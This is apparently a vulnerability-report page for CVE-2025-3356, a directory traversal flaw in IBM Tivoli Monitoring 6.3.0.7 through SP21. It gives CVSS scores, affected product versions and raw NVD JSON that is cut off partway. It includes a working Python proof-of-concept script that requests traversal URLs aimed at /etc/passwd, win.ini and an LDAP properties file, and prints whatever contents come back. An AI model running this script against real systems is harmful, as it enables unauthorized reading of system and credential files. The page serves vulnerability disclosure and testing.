Security Vulnerability Report
CVE-2025-3356 CVSS 8.6 HIGH

CVE-2025-3356

Published: 2025-10-30 20:15:39
Last Modified: 2025-11-07 02:10:58

Description

IBM Tivoli Monitoring 6.3.0.7 through 6.3.0.7 Service Pack 21 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view, overwrite, or append to arbitrary files on the system.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H (this is the IBM-sourced "Secondary" metric recorded in the raw JSON below; the NVD "Primary" metric for the same CVE is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, scored 9.8 CRITICAL)

Configurations (Affected Products)

cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp12:*:*:*:*:*:* - VULNERABLE
IBM Tivoli Monitoring 6.3.0.7
IBM Tivoli Monitoring 6.3.0.7 Service Pack 1 through Service Pack 21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-3356 Path Traversal PoC # Target: IBM Tivoli Monitoring 6.3.0.7 - 6.3.0.7 SP21 # Vulnerability: Directory Traversal via dot-dot sequences import requests import sys def test_path_traversal(target_url): """Test for CVE-2025-3356 path traversal vulnerability""" # Common sensitive files to target sensitive_files = [ '/etc/passwd', '../../../etc/passwd', '../../../../etc/passwd', '../../../../../etc/passwd', '../../../windows/win.ini', '../../../../windows/win.ini', '../../../ibm/tivoli/itim/conf/ldap.properties', '../../../../ibm/tivoli/itim/conf/ldap.properties' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-3356 Path Traversal Test") print("=" * 60) for file_path in sensitive_files: # Try different path traversal patterns test_urls = [ f"{target_url}/ibm/console/logon.jsp{file_path}", f"{target_url}/tivoli/{file_path}", f"{target_url}/jsp/{file_path}", f"{target_url}/..{file_path}", f"{target_url}/..%2F..%2F..%2F..{file_path}", f"{target_url}/.%2e/.%2e/.%2e/.%2e{file_path}" ] for url in test_urls: try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'text' in content_type or 'application' in content_type: if len(response.text) > 0 and len(response.text) < 100000: print(f"[+] POTENTIAL VULNERABILITY FOUND!") print(f"[+] URL: {url}") print(f"[+] File: {file_path}") print(f"[+] Content preview:") print(response.text[:500]) print("-" * 60) return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") print("[*] No obvious path traversal detected") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-3356.py <target_url>") print("Example: python cve-2025-3356.py https://target:9443") sys.exit(1) target = sys.argv[1].rstrip('/') 
test_path_traversal(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-3356", "sourceIdentifier": "[email protected]", "published": "2025-10-30T20:15:38.830", "lastModified": "2025-11-07T02:10:58.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Tivoli Monitoring 6.3.0.7 through 6.3.0.7 Service Pack 21 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view, overwrite, or append to arbitrary files on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:-:*:*:*:*:*:*", "matchCriteriaId": "15633ADC-6913-4AA1-8524-F139895B1C9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp1:*:*:*:*:*:*", "matchCriteriaId": "F8F29F79-3813-4B6F-A0FE-3E12711F2827"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp10:*:*:*:*:*:*", "matchCriteriaId": "63F43D7A-2BB8-475A-9F95-5AD83FC2F1E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp11:*:*:*:*:*:*", "matchCriteriaId": "89FE6200-3F7A-43E6-B9DB-24D1B956A509"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp12:*:*:*:*:*:*", "matchCriteriaId": "8632DB2C-4814-43F9-8AA9-682FB000CDC7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp13:*:*:*:*:*:*", "matchCriteriaId": "9D1B4834-85E5-4E41-9886-03BFD8424FF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp14:*:*:*:*:*:*", "matchCriteriaId": "54AE7933-034F-459B-8C02-2850D3153437"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp15:*:*:*:*:*:*", "matchCriteriaId": "643F4560-5049-466D-B4BA-18DDBBD2BEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp16:*:*:*:*:*:*", "matchCriteriaId": "3698F091-E08C-4B5C-9E85-1729A19A914F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp17:*:*:*:*:*:*", "matchCriteriaId": "DA218FEA-1091-4098-8A4C-3557924A27EE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp18:*:*:*:*:*:*", "matchCriteriaId": "6993220C-C737-4876-8E52-1C0CB9F109A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp19:*:*:*:*:*:*", "matchCriteriaId": "2AAFF1A2-750F-4C08-B544-0D6BC56D2048"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp2:*:*:*:*:*:*", "matchCriteriaId": "056BA0BC-CA53-4103-AA0A-692226602765"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp20:*:*:*:*:*:*", "matchCriteriaId": "68430D8F-B043-4179-860E-D4DADB7203E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp21:*:*:*:*:*:*", "matchCriteriaId": "B9984364-3AFB-4E06-97B0-53B7D5657882"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp3:*:*:*:*:*:*", "matchCriteriaId": "FC469C26-0D30-40CF-8A24-AC7940DD9D44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp4:*:*:*:*:*:*", "matchCriteriaId": "2E6529C0-2017-413A-9FF8-D3D09475E867"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp5:*:*:*:*:*:*", "matchCriteriaId": "BF411C3F-AB57-4F4B-92C7-6F6C142F2F64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp6:*:*:*:*:*:*", "matchCriteriaId": "C6BC45D1-9BE9-44FC-A99A-FF99F7393274"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp7:*:*:*:*:*:*", "matchCriteriaId": "53D77364-F817-4BE8-BF25-1537180B06DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp8:*:*:*:*:*:*", "matchCriteriaId": "680F331C-D4C7-4280-9981-9848BAE460C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp9:*:*:*:*:*:*", "matchCriteriaId": "3C ... (truncated)